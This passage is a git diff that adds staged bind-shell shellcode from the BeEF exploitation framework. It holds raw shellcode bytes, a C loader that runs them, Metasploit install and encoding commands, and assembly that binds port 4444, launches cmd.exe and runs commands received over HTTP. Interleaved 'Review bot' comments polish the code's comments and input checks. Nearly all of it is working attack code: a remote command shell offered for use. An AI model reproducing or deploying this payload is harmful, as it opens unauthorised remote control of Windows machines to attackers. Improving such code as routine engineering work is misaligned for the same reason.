+ "\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
+ "\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
+ "\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
+ }
+ ))
+ end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
new file mode 100644
index 000000000..d1c0fc2ff
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
@@ -0,0 +1,37 @@
+
+Install into Metasploit on BackTrack:
+
+cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb
+cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb
+cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb
+cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
+cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
+cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
+cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
+
+Check it works:
+
+msfpayload -l | grep beef_bind
+
+
+Get info on the payload:
+
+msfpayload windows/beef_shell/beef_bind S
+
+
+Dump stager and stage in C format:
+
+msfpayload windows/beef_shell/beef_bind C
+
+
+Dump stager in raw format:
+
+msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
+
+
+Encode stager to remove nulls:
+
+msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'
+
+
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
new file mode 100644
index 000000000..43325cf76
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0] ;code starts at offset 0
+
+ cld ;clear the direction flag
+ call start ;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+ pop ebp ;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stage.asm" ;setup web listener to proxy requests and responses to the shell
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
new file mode 100644
index 000000000..5dc580486
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0] ;code starts at offset 0
+
+ cld ;clear the direction flag
+ call start ;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+ pop ebp ;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stager.asm" ;setup bind port, receive web request, locate stage, execute it
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
new file mode 100644
index 000000000..a939bd498
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
@@ -0,0 +1,36 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+A standalone version can be compiled with MinGW:
+c:\MinGW\bin>gcc -o beefstager.exe beefstager.c
+
+and then executed with:
+c:\MinGW\bin>beefstager.exe 1234
+
+or just with the default port 4444:
+c:\MinGW\bin>beefstager.exe
+**/
+
+
+#include
+
+char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6";
+
+int main(int argc, char **argv)
+{
+if (argc == 2){
+ int port;
+ port = atoi(argv[1]);
+ if (port <= 0xFFFF){
+ code[200] = ((port & 0xFF00) >> 8) & 0xFF;
+ code[201] = ((port & 0xFF));
+ }
+}
+
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+ return 0;
+}
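Review bot: The port argument is parsed with `atoi` and checked only against the upper bound `port <= 0xFFFF`, so a negative or non-numeric value passes and its truncated bytes are written into `code[200]`/`code[201]`; `strtol` with `if (port < 1 || port > 0xFFFF) { /* reject */ }` would cover both the lower bound and parse failure. The header comment describes the file as `beefstager.c` built into `beefstager.exe` although the file is `socket.c`, and the bare `#include` line appears to have lost its header name — presumably a rendering artifact, but the committed source should be checked. The hard-coded indices 200/201 mirror `'LPORT' => [ 200, 'n' ]` in the msf Windows stager module; a comment such as `/* port bytes sit at the LPORT offset declared in beef_bind-stager-windows-x86.rb */` would keep the two from drifting apart silently.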
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
new file mode 100644
index 000000000..2acc13dde
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
@@ -0,0 +1,97 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+
+; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+; Output: The return value from the API call will be in EAX.
+; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+; Note: This function is unable to call forwarded exports.
+
+api_call:
+ pushad ; We preserve all the registers for the caller, bar EAX and ECX.
+ mov ebp, esp ; Create a new stack frame
+ xor edx, edx ; Zero EDX
+ mov edx, [fs:edx+48] ; Get a pointer to the PEB
+ mov edx, [edx+12] ; Get PEB->Ldr
+ mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
+next_mod: ;
+ mov esi, [edx+40] ; Get pointer to modules name (unicode string)
+ movzx ecx, word [edx+38] ; Set ECX to the length we want to check
+ xor edi, edi ; Clear EDI which will store the hash of the module name
+loop_modname: ;
+ xor eax, eax ; Clear EAX
+ lodsb ; Read in the next byte of the name
+ cmp al, 'a' ; Some versions of Windows use lower case module names
+ jl not_lowercase ;
+ sub al, 0x20 ; If so normalise to uppercase
+not_lowercase: ;
+ ror edi, 13 ; Rotate right our hash value
+ add edi, eax ; Add the next byte of the name
+ loop loop_modname ; Loop untill we have read enough
+ ; We now have the module hash computed
+ push edx ; Save the current position in the module list for later
+ push edi ; Save the current module hash for later
+ ; Proceed to itterate the export address table,
+ mov edx, [edx+16] ; Get this modules base address
+ mov eax, [edx+60] ; Get PE header
+ add eax, edx ; Add the modules base address
+ mov eax, [eax+120] ; Get export tables RVA
+ test eax, eax ; Test if no export address table is present
+ jz get_next_mod1 ; If no EAT present, process the next module
+ add eax, edx ; Add the modules base address
+ push eax ; Save the current modules EAT
+ mov ecx, [eax+24] ; Get the number of function names
+ mov ebx, [eax+32] ; Get the rva of the function names
+ add ebx, edx ; Add the modules base address
+ ; Computing the module hash + function hash
+get_next_func: ;
+ jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
+ dec ecx ; Decrement the function name counter
+ mov esi, [ebx+ecx*4] ; Get rva of next module name
+ add esi, edx ; Add the modules base address
+ xor edi, edi ; Clear EDI which will store the hash of the function name
+ ; And compare it to the one we want
+loop_funcname: ;
+ xor eax, eax ; Clear EAX
+ lodsb ; Read in the next byte of the ASCII function name
+ ror edi, 13 ; Rotate right our hash value
+ add edi, eax ; Add the next byte of the name
+ cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
+ jne loop_funcname ; If we have not reached the null terminator, continue
+ add edi, [ebp-8] ; Add the current module hash to the function hash
+ cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
+ jnz get_next_func ; Go compute the next function hash if we have not found it
+ ; If found, fix up stack, call the function and then value else compute the next one...
+ pop eax ; Restore the current modules EAT
+ mov ebx, [eax+36] ; Get the ordinal table rva
+ add ebx, edx ; Add the modules base address
+ mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
+ mov ebx, [eax+28] ; Get the function addresses table rva
+ add ebx, edx ; Add the modules base address
+ mov eax, [ebx+4*ecx] ; Get the desired functions RVA
+ add eax, edx ; Add the modules base address to get the functions actual VA
+ ; We now fix up the stack and perform the call to the desired function...
+finish:
+ mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
+ pop ebx ; Clear off the current modules hash
+ pop ebx ; Clear off the current position in the module list
+ popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+ pop ecx ; Pop off the origional return address our caller will have pushed
+ pop edx ; Pop off the hash value our caller will have pushed
+ push ecx ; Push back the correct return value
+ jmp eax ; Jump into the required function
+ ; We now automagically return to the correct caller...
+get_next_mod: ;
+ pop eax ; Pop off the current (now the previous) modules EAT
+get_next_mod1: ;
+ pop edi ; Pop off the current (now the previous) modules hash
+ pop edx ; Restore our position in the module list
+ mov edx, [edx] ; Get the next module
+ jmp short next_mod ; Process this module
\ No newline at end of file
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
new file mode 100644
index 000000000..c88ab6e23
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
@@ -0,0 +1,177 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_virtualalloc.asm"
+ ; Input: None
+ ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+ ; Clobbers: EAX, EBX, ECX, EDX
+
+ mov esi, eax ; point esi to start of buffer, used as pseudo-frame pointer
+
+%include "src/block_pipes.asm"
+ ; Create pipes to redirect stage stdin, stdout, stderr
+ ; Input: EBP is api_call
+ ; Output:
+ ; esp+00 child stdin read file descriptor (inherited)
+ ; esp+04 child stdin write file descriptor (not inherited)
+ ; esp+08 child stdout read file descriptor (not inherited)
+ ; esp+12 child stdout write file descriptor (inherited)
+ ; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
+ ; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+ mov edi,esi ; save esi since it gets clobbered
+
+%include "src/block_shell_pipes.asm"
+ ; Create process with redirected stdin, stdout, stderr to our pipes
+ ; Input:
+ ; EBP is api_call
+ ; esp+00 child stdin read file descriptor (inherited)
+ ; esp+04 not used
+ ; esp+08 not used
+ ; esp+12 child stdout write file descriptor (inherited)
+ ; Output: None.
+ ; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+ mov esi,edi ; restore esi
+
+ReadLoop: ; Read output from the child process
+
+clear_buffer:
+ mov ecx,0xFF8 ; zero output buffer starting at esi+8 with 0xFF8 nulls
+ lea eax,[esi+8] ; point eax to start of command/output buffer
+zero_buffer:
+ mov byte [eax],0 ; push a null dword
+ inc eax ; point to the next byte in the buffer
+ loop zero_buffer ; keep looping untill we have zeroed the buffer
+
+
+response_headers:
+ push esi ; save pointer to start of buffer
+ lea edi,[esi+1048] ; set pointer to output buffer
+ call get_headers ; locate the static http response headers
+ db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a
+get_headers:
+ pop esi ; get pointer to response headers into esi
+ mov ecx, 98 ; length of http response headers
+ rep movsb ; move the http headers into the buffer
+ pop esi ; restore pointer to start of buffer
+
+
+bind_port:
+ push esi ; save buffer pointer onto stack
+%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket
+ ; Input: EBP must be the address of 'api_call'.
+ ; Output: EDI will be the newly connected clients socket
+ ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+ add esp, 0x1A0 ; restore stack pointer
+ pop esi ; restore buffer pointer
+ mov [esi], edi ; save external socket to buffer
+
+
+recv: ; Receive the web request - must be a post request with command ending with a new line character
+ push byte 0 ; flags
+ push 0x400 ; allocated space for command (512 bytes)
+ mov ebx, esi ; start of our request/response memory buffer
+ add ebx, 8 ; start of our allocated command space
+ push ebx ; start of our allocated command space
+ push dword [esi] ; external socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( external_socket, buffer, size, 0 );
+
+find_cmd: ; Search for "cmd=" in the web request
+ mov edx, [esp+0x64] ; stage stdin read file descriptor (40)
+ mov ecx, 0x400 ; set ecx to be our buffer counter
+next:
+ cmp dword [ebx], 0x3d646d63 ; check if ebx points to "cmd="
+ jz cmd_found ; if we found "cmd=" then parse the command
+ inc ebx ; point ebx to next char in request data
+ dec ecx ; dec our buffer counter
+ jecxz read_file_check ; if our counter is 0 then we found no command, so recv more data
+ jmp short next ; check next location for "cmd="
+cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off
+ add ebx, 0x03 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command
+
+next_cmd_char:
+ inc ebx ; move our command string pointer up one character
+ push ebx ; save command pointer to the stack
+
+write_file:
+ push 0 ; pOverlapped = NULL
+ lea edi,[esi+1040] ; 4 bytes for bytes written
+ push edi ; pBytesWritten
+ push 1 ; nBytesToWrite
+ push ebx ; command string in buffer
+ mov ebx,[esp+70h] ; Child stdin
+ push ebx ; child stdin
+ push 0x5BAE572D ; hash(kernel32.dll, WriteFile)
+ call ebp ; WriteFile
+
+ pop ebx ; restore command pointer from the stack
+ cmp byte [ebx], 0x0a ; check if we have just sent a new line
+ jnz next_cmd_char ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket
+
+
+%include "src/block_sleep.asm"
+ ; Input: None
+ ; Output: None. Sleeps for x seconds
+ ; Clobbers: None
+
+read_file_check:
+ xor eax, eax ; zero eax
+ push eax ; lpBytesLeftThisMessage
+ lea ebx,[esi+4] ; address to output the result - num bytes available to read
+ push ebx ; lpTotalBytesAvail
+ push eax ; lpBytesRead
+ push eax ; nBufferSize
+ push eax ; lpBuffer
+ lea ebx,[esp+74h] ; child stdout read address
+ mov ebx, [ebx] ; child stdout read file descriptor
+ push ebx ; hNamedPipe
+ push 0xB33CB718 ; hash(kernel32.dll,PeekNamedPipe)
+ call ebp ; PeekNamedPipe
+
+ test eax, eax ; check the function return correctly
+ jz close_handle ; no, then close the connection and start again
+ mov eax, [esi+4] ; Grab the number of bytes available
+ test eax, eax ; check for no bytes to read
+ jz close_handle ; no, then close the connection and start again
+
+read_file:
+ push 0 ; pOverlapped = NULL
+ lea edi,[esi+1044] ; output: number of bytes read
+ push edi ; pBytesRead
+ push 0xB86 ; BytesToRead: remaining space in our allocated buffer
+ ;lea edi,[esi+1114] ; start of remaining space in buffer after response headers
+ lea edi,[esi+1146] ; start of remaining space in buffer after response headers
+ push edi ; start of remaining space in buffer after response headers
+ lea ebx,[esp+70h] ; child stdout read address
+ mov ebx, [ebx] ; child stdout read file descriptor
+ push ebx ; hFile: child stdout address
+ push 0xBB5F9EAD ; hash(kernel32.dll,ReadFile)
+ call ebp ; ReadFile
+
+
+send_output: ; send buffer to the external socket
+ push byte 0 ; flags
+ push 0xBE8 ; len
+ lea edi,[esi+1048] ; start of output buffer
+ push edi ; pointer to buffer
+ push dword [esi] ; external socket
+ push 0x5F38EBC2 ; hash ( "ws2_32.dll", "send" )
+ call ebp ; send(external_socket, *buf, len, flags);
+
+
+close_handle:
+ push dword [esi] ; hObject: external socket
+ push 0x528796C6 ; hash(kernel32.dll,CloseHandle)
+ call ebp ; CloseHandle
+
+ jmp ReadLoop
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
new file mode 100644
index 000000000..50059ad2e
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
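Review bot: Several comments in this block no longer describe the instruction beside them: `mov byte [eax],0 ; push a null dword` stores a single byte, not a dword; `jecxz read_file_check ; ... so recv more data` jumps to `read_file_check`, not back to `recv`; and `add ebx, 0x03 ; ... (plus inc eax below)` refers to `inc ebx`. The commented-out `;lea edi,[esi+1114]` under `read_file` is dead code sitting beside the live `lea edi,[esi+1146]` and should be deleted rather than kept as an alternative. Suggested replacements: `; store a null byte`, `; counter exhausted: no "cmd=" found, fall through to the pipe check` and `; add 3 (plus inc ebx below) to point to command`.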
@@ -0,0 +1,47 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_bind_tcp.asm" ;by here we will have performed the bind_tcp connection to setup our external web socket
+ ; Input: EBP must be the address of 'api_call'.
+ ; Output: EDI will be the newly connected clients socket
+ ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+%include "src/block_virtualalloc.asm"
+ ; Input: None
+ ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
+ ; Clobbers: EAX, EBX, ECX, EDX
+
+ mov esi, eax ; save pointer to buffer since eax gets clobbered
+
+recv: ; Receive the web request containing the stage
+ push byte 0 ; flags
+ push ebx ; allocated space for stage
+ push eax ; start of our allocated command space
+ push edi ; external socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( external_socket, buffer, size, 0 );
+
+
+close_handle:
+ push edi ; hObject: external socket
+ push 0x528796C6 ; hash(kernel32.dll,CloseHandle)
+ call ebp ; CloseHandle
+
+find_cmd: ; Search for "cmd=" in the web request for our payload
+ cmp dword [esi], 0x3d646d63 ; check if ebx points to "cmd="
+ jz cmd_found ; if we found "cmd=" then parse the command
+ inc esi ; point ebx to next char in request data
+ jmp short find_cmd ; check next location for "cmd="
+cmd_found: ; now pointing to start of our command - MAY fail if the command is cut off
+; add esi,4 ; starts off pointing at "cmd=" so add 3 (plus inc eax below) to point to command ... this compiles to 6 byte opcode
+ db 0x83, 0xC6, 0x04 ; add esi,4 ... but only 3 byte opcode
+
+ jmp esi ; jump to our stage payload
+
+
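Review bot: The comments on the find_cmd loop refer to ebx while the instructions operate on esi (`cmp dword [esi], 0x3d646d63` and `inc esi`), which misleads anyone tracking registers from the block's header; they should read `; check if esi points to "cmd="` and `; point esi to next char in request data`. The commented-out line under cmd_found still says "add 3 (plus inc eax below)", describing code that no longer exists; the `db 0x83, 0xC6, 0x04` line should carry the explanation on its own, e.g. `; add esi,4 (hand-encoded 3-byte form): skip the "cmd=" marker`. The header lists only EBP as input; since the block also falls through from block_bind_tcp and block_virtualalloc with EDI (socket), EAX/ESI (buffer) and EBX (size) live, an Output/Clobbers line matching the style of the included blocks would help.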
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
new file mode 100644
index 000000000..3ac5f8c70
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
@@ -0,0 +1,63 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+ push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
+ push 0x5F327377 ; ...
+ push esp ; Push a pointer to the "ws2_32" string on the stack.
+ push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+ call ebp ; LoadLibraryA( "ws2_32" )
+
+ mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
+ sub esp, eax ; alloc some space for the WSAData structure
+ push esp ; push a pointer to this stuct
+ push eax ; push the wVersionRequested parameter
+ push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+ call ebp ; WSAStartup( 0x0190, &WSAData );
+
+ push eax ; if we succeed, eax wil be zero, push zero for the flags param.
+ push eax ; push null for reserved parameter
+ push eax ; we do not specify a WSAPROTOCOL_INFO structure
+ push eax ; we do not specify a protocol
+ inc eax ;
+ push eax ; push SOCK_STREAM
+ inc eax ;
+ push eax ; push AF_INET
+ push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+ call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+ xchg edi, eax ; save the socket for later, don't care about the value of eax after this
+
+ xor ebx, ebx ; Clear EBX
+ push ebx ; bind to 0.0.0.0
+ push 0x5C110002 ; family AF_INET and port 4444
+ mov esi, esp ; save a pointer to sockaddr_in struct
+ push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+ push esi ; pointer to the sockaddr_in struct
+ push edi ; socket
+ push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
+ call ebp ; bind( s, &sockaddr_in, 16 );
+
+ push ebx ; backlog
+ push edi ; socket
+ push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
+ call ebp ; listen( s, 0 );
+
+ push ebx ; we set length for the sockaddr struct to zero
+ push ebx ; we dont set the optional sockaddr param
+ push edi ; listening socket
+ push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
+ call ebp ; accept( s, 0, 0 );
+
+ push edi ; push the listening socket to close
+ xchg edi, eax ; replace the listening socket with the new connected socket for further comms
+ push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
+ call ebp ; closesocket( s );
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
new file mode 100644
index 000000000..941564c34
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP is api_call
+; Output:
+; esp+00 child stdin read file descriptor (inherited)
+; esp+04 child stdin write file descriptor (not inherited)
+; esp+08 child stdout read file descriptor (not inherited)
+; esp+12 child stdout write file descriptor (inherited)
+; esp+16 lpPipeAttributes structure (not used after block - 12 bytes)
+; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+ push 1 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
+ push 0
+ push 0x0C
+
+create_pipe_stdout:
+ push 0 ; allocate space on stack for child stdout file descriptor
+ mov ebx, esp ; save location of where the child stdout Write file descriptor will be
+ push 0 ; allocate space on stack for child stdout file descriptor
+ mov ecx, esp ; save location of where the child stdout Read file descriptor will be
+
+ push 0 ; nSize
+ lea edi,[esp+12] ; lpPipeAttributes - inherited
+ push edi
+ push ebx ; stdout write file descriptor
+ push ecx ; stdout read file descriptor
+ push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" )
+ call ebp ; CreatePipe( Read, Write, 0, 0 )
+
+create_pipe_stdin:
+ push 0 ; allocate space on stack for child stdout file descriptor
+ mov ebx, esp ; save location of where the child stdout Write file descriptor will be
+ push 0 ; allocate space on stack for child stdout file descriptor
+ mov ecx, esp ; save location of where the child stdout Read file descriptor will be
+
+ push 0 ; nSize
+ lea edi,[esp+20] ; lpPipeAttributes - inherited
+ push edi
+ push ebx ; stdout write file descriptor
+ push ecx ; stdout read file descriptor
+ push 0x0EAFCF3E ; hash ( "kernel.dll", "CreatePipe" )
+ call ebp ;
CreatePipe( Read, Write, 0, 0 )
+
+no_inherit_read_handle: ; ensure read and write handles to child proc pipes for are not inherited
+ mov ebx,[esp+8]
+ push 0
+ push 1
+ push ebx ; hChildStdoutRd is the address we set in the CreatePipe call
+ push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
+ call ebp ; SetHandleInformation
+
+no_inherit_write_handle:
+ mov ebx,[esp+4]
+ push 0
+ push 1
+ push ebx ; hChildStdinRw is the address we set in the CreatePipe call
+ push 0x1CD313CA ; hash(kernel32.dll, SetHandleInformation)
+ call ebp ; SetHandleInformation
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
new file mode 100644
index 000000000..33e807866
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
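Review bot: The create_pipe_stdin block's comments are a verbatim copy of create_pipe_stdout's and still say "stdout", so its four stack-slot comments and the two `push` comments contradict the label and the header table; they should read "child stdin Write file descriptor" / "child stdin Read file descriptor", with `; stdin write file descriptor` and `; stdin read file descriptor` on the pushes. Both CreatePipe hash comments name `"kernel.dll"` while every other hash comment in this change names `kernel32.dll`; `; hash ( "kernel32.dll", "CreatePipe" )` keeps them consistent. In no_inherit_write_handle the comment says `hChildStdinRw`, but the header documents esp+04 as the child stdin write descriptor, so `hChildStdinWr` is presumably intended. The label comment "pipes for are not inherited" also reads as a typo for "pipes are not inherited".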
@@ -0,0 +1,56 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Credits: Some code borrowed from block_shell.asm; Stephen Fewer
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input:
+; EBP is api_call
+; esp+00 child stdin read file descriptor (inherited)
+; esp+04 not used
+; esp+08 not used
+; esp+12 child stdout write file descriptor (inherited)
+; Output: None.
+; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+shell:
+ push 0x00646D63 ; push our command line: 'cmd',0
+ mov ebx, esp ; save a pointer to the command line
+ push dword [esp+16] ; child stdout write file descriptor for process stderr
